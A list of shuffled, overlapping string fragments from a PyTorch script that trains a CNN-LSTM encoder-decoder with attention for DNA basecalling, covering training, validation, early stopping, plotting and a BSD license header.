"ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch),",
"'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: #",
"idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape)",
"in max_for: # Stop looping if we got to the last element in",
"if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b =",
"labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x",
"shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim]",
"= data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False),",
"if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit",
"Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf is",
"in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser",
"args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization",
"sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target,",
"0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0",
"negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : ,",
"the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren",
"val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to",
"right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))),",
"= {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 =",
"LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn",
"encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] # batch, features, seq",
"ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len]",
"gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias)))",
"self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional",
".format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget",
"outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim]",
"sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that they match",
"cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc)",
"forget gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate",
"length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable",
"sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4],",
"n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration = []",
"#Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1]",
"length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation:",
"Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder):",
"optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion",
"cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2, n",
"train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None:",
"def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std)",
"in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx]",
"if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if",
"true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer # shape",
"-1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u',",
"ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()),",
"h5py import numpy as np import os import sys import torch import torch.nn",
"= np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation',",
"= editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc,",
"input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1,",
":] return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self,",
"dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) #",
"length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i <",
"if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn",
"print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc /",
"for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred)",
"'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer =",
"{:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses",
"w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h = h.view(h.size(0),",
"3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir",
"must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal",
"/ total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train',",
": , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx,",
"# remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :]",
"self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden",
"train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is",
"updates from validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))),",
"plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path,",
"df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure",
"running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates]",
"plt.title(\"Edit distance vs. updates from validation set\") if pdf is not None: pdf.savefig(fig,",
"torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target,",
"figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train,",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val],",
"IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY",
"layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder',",
"= val_editd # early_stopping needs the validation loss to check if it has",
"use actual next token as next input #if not, use predicted token onehot",
"seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() #",
"plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))),",
"= input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2)",
"if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True)",
"(batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy,",
"= torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden;",
"########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm,",
"enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda",
"= running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] =",
"100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc /",
"0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)),",
"sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder",
"'--input', required = True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output',",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"retain the above copyright notice, this list of conditions and the following disclaimer.",
"x, hidden): h, c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0),",
"i] # batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights =",
"= data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them",
"to use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio # put",
"# create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create",
"e.g. [batch size] = 32 is a good default value CNN = SimpleCNN(input_channel=1,",
"x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1),",
"F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) +",
"import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F import",
"OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT",
"epoch % print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy()))",
"= np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for",
"batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size,",
"dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional =",
"gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10",
"args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel",
"= 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration +",
"def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname =",
"f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(),",
"\"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0,",
"= model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer",
"reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 #",
"in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from",
"\"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and",
"default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn,",
"outgate start, end = n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.)",
"float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if",
"own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout # Define",
"= original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:,",
"label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\")",
"enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256, 1,",
"weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as",
"2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in",
"reserved. Redistribution and use in source and binary forms, with or without modification,",
"# unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 =",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\",",
"hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def",
"out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size,",
"out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10,",
"plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1,",
"param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(),",
"return parser # Network # ----------- # * CNN-Encoder # * LSTM-Encoder #",
"of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the",
"* LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size,",
"requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val,",
"+= num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates == 0:",
"self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim *",
"1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size,",
"y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len,",
"= optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable",
"rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint",
"SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,",
"__init__(self, start, end): self.start = start self.end = end def __eq__(self, other): return",
"shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM",
"writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd,",
"val_editd # early_stopping needs the validation loss to check if it has decresed,",
"= x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate,",
"svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for",
"0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if",
"running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1))))",
"sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not padded elements loss",
"THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import",
"num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim",
"is what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers,",
"start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch",
"seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove",
"of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b), where a",
"and binary forms, with or without modification, are permitted provided that the following",
"k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\")",
"from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import pandas as",
"0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None",
"sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder,",
"get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len,",
"nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)),",
"import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len",
"0 heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b = None",
"in name and \"lstm\" in name and \"linear\" not in name: for b",
"ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start:",
"y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM",
"bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder =",
"+ (ingate * cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy),",
"args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn",
"[v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v",
"data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds !=",
"requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len,",
"plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax",
"set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))],",
"[batch size] = 32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out,",
"n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 =",
"onehot[:, top1] = 1 # one hot encode input input_decoder = label if",
"\", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass",
"default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias",
"* hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size)",
"lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val,",
"#256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm",
"Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val",
"self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise our hidden",
"element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only",
"shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b), where",
"(reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val",
"self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers",
"\"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end =",
"outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2, n #",
"teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay",
"reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print",
"nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?',",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden =",
"enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val =",
"self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional,",
"if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name,",
"trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs,",
"teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size",
"label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your",
"None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: #",
"0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss /",
"+= 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df =",
"batch, output_dim] # shape of self.hidden: (a, b), where a and b both",
"if it has, it will make a checkpoint of the current model if",
"epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at",
"np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x",
"in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+',",
"dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights,",
"self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len,",
"model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1",
